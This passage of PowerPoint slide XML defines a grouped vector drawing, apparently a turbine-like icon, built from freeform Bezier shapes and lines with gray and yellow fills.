                      <a:pt x="139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B3B3B"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="808080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790" name="Group 780"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6721472" y="2430151"/>
              <a:ext cx="396875" cy="674687"/>
              <a:chOff x="-7292" y="1988"/>
              <a:chExt cx="888" cy="1514"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="791" name="Freeform 781"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 943 h 943"/>
                  <a:gd name="T1" fmla="*/ 0 h 943"/>
                  <a:gd name="T2" fmla="*/ 943 h 94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943">
                    <a:moveTo>
                      <a:pt x="0" y="943"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="943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2" name="Line 782"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="94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3" name="Freeform 783"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7048" y="2425"/>
                <a:ext cx="18" cy="961"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 403 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 8"/>
                  <a:gd name="T3" fmla="*/ 4 h 407"/>
                  <a:gd name="T4" fmla="*/ 4 w 8"/>
                  <a:gd name="T5" fmla="*/ 0 h 407"/>
                  <a:gd name="T6" fmla="*/ 4 w 8"/>
                  <a:gd name="T7" fmla="*/ 0 h 407"/>
                  <a:gd name="T8" fmla="*/ 8 w 8"/>
                  <a:gd name="T9" fmla="*/ 4 h 407"/>
                  <a:gd name="T10" fmla="*/ 8 w 8"/>
                  <a:gd name="T11" fmla="*/ 4 h 407"/>
                  <a:gd name="T12" fmla="*/ 8 w 8"/>
                  <a:gd name="T13" fmla="*/ 403 h 407"/>
                  <a:gd name="T14" fmla="*/ 4 w 8"/>
                  <a:gd name="T15" fmla="*/ 407 h 407"/>
                  <a:gd name="T16" fmla="*/ 4 w 8"/>
                  <a:gd name="T17" fmla="*/ 407 h 407"/>
                  <a:gd name="T18" fmla="*/ 0 w 8"/>
                  <a:gd name="T19" fmla="*/ 403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07">
                    <a:moveTo>
                      <a:pt x="0" y="40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03"/>
                      <a:pt x="8" y="403"/>
                      <a:pt x="8" y="403"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="405"/>
                      <a:pt x="6" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="407"/>
                      <a:pt x="0" y="405"/>
                      <a:pt x="0" y="4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4" name="Freeform 784"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 340"/>
                  <a:gd name="T1" fmla="*/ 378 h 378"/>
                  <a:gd name="T2" fmla="*/ 340 w 340"/>
                  <a:gd name="T3" fmla="*/ 0 h 378"/>
                  <a:gd name="T4" fmla="*/ 0 w 340"/>
                  <a:gd name="T5" fmla="*/ 378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0" h="378">
                    <a:moveTo>
                      <a:pt x="0" y="378"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="340" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37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5" name="Line 785"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="37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6" name="Freeform 786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7086" y="2125"/>
                <a:ext cx="361" cy="399"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 153"/>
                  <a:gd name="T1" fmla="*/ 168 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 153"/>
                  <a:gd name="T3" fmla="*/ 162 h 169"/>
                  <a:gd name="T4" fmla="*/ 1 w 153"/>
                  <a:gd name="T5" fmla="*/ 162 h 169"/>
                  <a:gd name="T6" fmla="*/ 145 w 153"/>
                  <a:gd name="T7" fmla="*/ 2 h 169"/>
                  <a:gd name="T8" fmla="*/ 151 w 153"/>
                  <a:gd name="T9" fmla="*/ 2 h 169"/>
                  <a:gd name="T10" fmla="*/ 151 w 153"/>
                  <a:gd name="T11" fmla="*/ 2 h 169"/>
                  <a:gd name="T12" fmla="*/ 151 w 153"/>
                  <a:gd name="T13" fmla="*/ 8 h 169"/>
                  <a:gd name="T14" fmla="*/ 151 w 153"/>
                  <a:gd name="T15" fmla="*/ 8 h 169"/>
                  <a:gd name="T16" fmla="*/ 7 w 153"/>
                  <a:gd name="T17" fmla="*/ 167 h 169"/>
                  <a:gd name="T18" fmla="*/ 4 w 153"/>
                  <a:gd name="T19" fmla="*/ 169 h 169"/>
                  <a:gd name="T20" fmla="*/ 4 w 153"/>
                  <a:gd name="T21" fmla="*/ 169 h 169"/>
                  <a:gd name="T22" fmla="*/ 1 w 153"/>
                  <a:gd name="T23" fmla="*/ 168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3" h="169">
                    <a:moveTo>
                      <a:pt x="1" y="168"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="164"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="1"/>
                      <a:pt x="149" y="0"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="3"/>
                      <a:pt x="153" y="6"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="168"/>
                      <a:pt x="5" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="169"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="1" y="1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7" name="Freeform 787"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7292" y="2949"/>
                <a:ext cx="508" cy="553"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 215"/>
                  <a:gd name="T1" fmla="*/ 205 h 234"/>
                  <a:gd name="T2" fmla="*/ 191 w 215"/>
                  <a:gd name="T3" fmla="*/ 198 h 234"/>
                  <a:gd name="T4" fmla="*/ 117 w 215"/>
                  <a:gd name="T5" fmla="*/ 183 h 234"/>
                  <a:gd name="T6" fmla="*/ 117 w 215"/>
                  <a:gd name="T7" fmla="*/ 182 h 234"/>
                  <a:gd name="T8" fmla="*/ 117 w 215"/>
                  <a:gd name="T9" fmla="*/ 10 h 234"/>
                  <a:gd name="T10" fmla="*/ 107 w 215"/>
                  <a:gd name="T11" fmla="*/ 0 h 234"/>
                  <a:gd name="T12" fmla="*/ 97 w 215"/>
                  <a:gd name="T13" fmla="*/ 10 h 234"/>
                  <a:gd name="T14" fmla="*/ 97 w 215"/>
                  <a:gd name="T15" fmla="*/ 182 h 234"/>
                  <a:gd name="T16" fmla="*/ 97 w 215"/>
                  <a:gd name="T17" fmla="*/ 183 h 234"/>
                  <a:gd name="T18" fmla="*/ 24 w 215"/>
                  <a:gd name="T19" fmla="*/ 198 h 234"/>
                  <a:gd name="T20" fmla="*/ 0 w 215"/>
                  <a:gd name="T21" fmla="*/ 205 h 234"/>
                  <a:gd name="T22" fmla="*/ 20 w 215"/>
                  <a:gd name="T23" fmla="*/ 210 h 234"/>
                  <a:gd name="T24" fmla="*/ 83 w 215"/>
                  <a:gd name="T25" fmla="*/ 200 h 234"/>
                  <a:gd name="T26" fmla="*/ 97 w 215"/>
                  <a:gd name="T27" fmla="*/ 231 h 234"/>
                  <a:gd name="T28" fmla="*/ 107 w 215"/>
                  <a:gd name="T29" fmla="*/ 234 h 234"/>
                  <a:gd name="T30" fmla="*/ 119 w 215"/>
                  <a:gd name="T31" fmla="*/ 230 h 234"/>
                  <a:gd name="T32" fmla="*/ 132 w 215"/>
                  <a:gd name="T33" fmla="*/ 200 h 234"/>
                  <a:gd name="T34" fmla="*/ 195 w 215"/>
                  <a:gd name="T35" fmla="*/ 210 h 234"/>
                  <a:gd name="T36" fmla="*/ 215 w 215"/>
                  <a:gd name="T37" fmla="*/ 205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5" h="234">
                    <a:moveTo>
                      <a:pt x="215" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="117" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="4"/>
                      <a:pt x="113" y="0"/>
                      <a:pt x="107" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="0"/>
                      <a:pt x="97" y="4"/>
                      <a:pt x="97" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="183"/>
                      <a:pt x="97" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="215" y="20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8" name="Freeform 788"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6940" y="1988"/>
                <a:ext cx="494" cy="361"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 209"/>
                  <a:gd name="T1" fmla="*/ 60 h 153"/>
                  <a:gd name="T2" fmla="*/ 32 w 209"/>
                  <a:gd name="T3" fmla="*/ 153 h 153"/>
                  <a:gd name="T4" fmla="*/ 209 w 209"/>
                  <a:gd name="T5" fmla="*/ 6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9" h="153">
                    <a:moveTo>
                      <a:pt x="209" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="0"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="32" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="209" y="6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9" name="Freeform 789"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6881" y="2097"/>
                <a:ext cx="459" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 194"/>
                  <a:gd name="T1" fmla="*/ 50 h 118"/>
                  <a:gd name="T2" fmla="*/ 191 w 194"/>
                  <a:gd name="T3" fmla="*/ 25 h 118"/>
                  <a:gd name="T4" fmla="*/ 194 w 194"/>
                  <a:gd name="T5" fmla="*/ 29 h 118"/>
                  <a:gd name="T6" fmla="*/ 184 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 118"/>
                  <a:gd name="T8" fmla="*/ 68 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 118"/>
                  <a:gd name="T10" fmla="*/ 8 w 194"/>
                  <a:gd name="T11" fmla="*/ 109 h 118"/>
                  <a:gd name="T12" fmla="*/ 12 w 194"/>
                  <a:gd name="T13" fmla="*/ 118 h 118"/>
                  <a:gd name="T14" fmla="*/ 73 w 194"/>
                  <a:gd name="T15" fmla="*/ 5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4" h="118">
                    <a:moveTo>
                      <a:pt x="73" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="22"/>
                      <a:pt x="174" y="11"/>
                      <a:pt x="191" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="185" y="15"/>
                      <a:pt x="184" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="0"/>
                      <a:pt x="115" y="11"/>
                      <a:pt x="68" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="63"/>
                      <a:pt x="0" y="93"/>
                      <a:pt x="8" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="109"/>
                      <a:pt x="10" y="114"/>
                      <a:pt x="12" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="101"/>
                      <a:pt x="32" y="73"/>
                      <a:pt x="73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0" name="Freeform 790"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6862" y="2123"/>
                <a:ext cx="458" cy="304"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 194"/>
                  <a:gd name="T1" fmla="*/ 19 h 129"/>
                  <a:gd name="T2" fmla="*/ 187 w 194"/>
                  <a:gd name="T3" fmla="*/ 19 h 129"/>
                  <a:gd name="T4" fmla="*/ 186 w 194"/>
                  <a:gd name="T5" fmla="*/ 18 h 129"/>
                  <a:gd name="T6" fmla="*/ 183 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 129"/>
                  <a:gd name="T8" fmla="*/ 65 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 129"/>
                  <a:gd name="T10" fmla="*/ 4 w 194"/>
                  <a:gd name="T11" fmla="*/ 107 h 129"/>
                  <a:gd name="T12" fmla="*/ 4 w 194"/>
                  <a:gd name="T13" fmla="*/ 107 h 129"/>
                  <a:gd name="T14" fmla="*/ 4 w 194"/>
                  <a:gd name="T15" fmla="*/ 109 h 129"/>
                  <a:gd name="T16" fmla="*/ 7 w 194"/>
                  <a:gd name="T17" fmla="*/ 113 h 129"/>
                  <a:gd name="T18" fmla="*/ 8 w 194"/>
                  <a:gd name="T19" fmla="*/ 114 h 129"/>
                  <a:gd name="T20" fmla="*/ 126 w 194"/>
                  <a:gd name="T21" fmla="*/ 90 h 129"/>
                  <a:gd name="T22" fmla="*/ 187 w 194"/>
                  <a:gd name="T23" fmla="*/ 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4" h="129">
                    <a:moveTo>
                      <a:pt x="187" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="186" y="18"/>
                      <a:pt x="186" y="18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66" y="0"/>
                      <a:pt x="113" y="11"/>
                      <a:pt x="65" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="62"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="108"/>
                      <a:pt x="4" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="8" y="114"/>
                      <a:pt x="8" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="129"/>
                      <a:pt x="78" y="118"/>
                      <a:pt x="126" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="65"/>
                      <a:pt x="194" y="36"/>
                      <a:pt x="187" y="19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1" name="Freeform 791"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6739" y="2205"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 56"/>
                  <a:gd name="T1" fmla="*/ 17 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 56"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 2 w 56"/>
                  <a:gd name="T5" fmla="*/ 30 h 34"/>
                  <a:gd name="T6" fmla="*/ 35 w 56"/>
                  <a:gd name="T7" fmla="*/ 23 h 34"/>
                  <a:gd name="T8" fmla="*/ 51 w 56"/>
                  <a:gd name="T9" fmla="*/ 1 h 34"/>
                  <a:gd name="T10" fmla="*/ 46 w 56"/>
                  <a:gd name="T11" fmla="*/ 0 h 34"/>
                  <a:gd name="T12" fmla="*/ 30 w 56"/>
                  <a:gd name="T13" fmla="*/ 1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34">
                    <a:moveTo>
                      <a:pt x="30" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="1" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="34"/>
                      <a:pt x="22" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="15"/>
                      <a:pt x="56" y="5"/>
                      <a:pt x="51" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0"/>
                      <a:pt x="46" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="4"/>
                      <a:pt x="40" y="11"/>
                      <a:pt x="3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2" name="Freeform 792"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6737" y="2203"/>
                <a:ext cx="107" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 45"/>
                  <a:gd name="T1" fmla="*/ 9 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 28"/>
                  <a:gd name="T4" fmla="*/ 29 w 45"/>
                  <a:gd name="T5" fmla="*/ 18 h 28"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 28"/>
                  <a:gd name="T8" fmla="*/ 17 w 45"/>
                  <a:gd name="T9" fmla="*/ 9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8">
                    <a:moveTo>
                      <a:pt x="17" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="1" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="28"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="12"/>
                      <a:pt x="45" y="5"/>
                      <a:pt x="45" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="28" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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3" name="Freeform 793"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="130" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 55"/>
                  <a:gd name="T1" fmla="*/ 2 h 34"/>
                  <a:gd name="T2" fmla="*/ 44 w 55"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 27 w 55"/>
                  <a:gd name="T5" fmla="*/ 18 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 55"/>
                  <a:gd name="T7" fmla="*/ 26 h 34"/>
                  <a:gd name="T8" fmla="*/ 1 w 55"/>
                  <a:gd name="T9" fmla="*/ 30 h 34"/>
                  <a:gd name="T10" fmla="*/ 34 w 55"/>
                  <a:gd name="T11" fmla="*/ 23 h 34"/>
                  <a:gd name="T12" fmla="*/ 50 w 55"/>
                  <a:gd name="T13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34">
                    <a:moveTo>
                      <a:pt x="50" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="37" y="12"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="24"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="34" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="5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4" name="Freeform 794"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="104" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 9 h 27"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 26 h 27"/>
                  <a:gd name="T6" fmla="*/ 27 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 27"/>
                  <a:gd name="T8" fmla="*/ 44 w 44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7">
                    <a:moveTo>
                      <a:pt x="44" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="17" y="24"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="12"/>
                      <a:pt x="44" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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5" name="Freeform 795"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6675" y="2278"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 56"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 29 w 56"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 56"/>
                  <a:gd name="T5" fmla="*/ 25 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 56"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 56"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 56"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 45 w 56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34">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
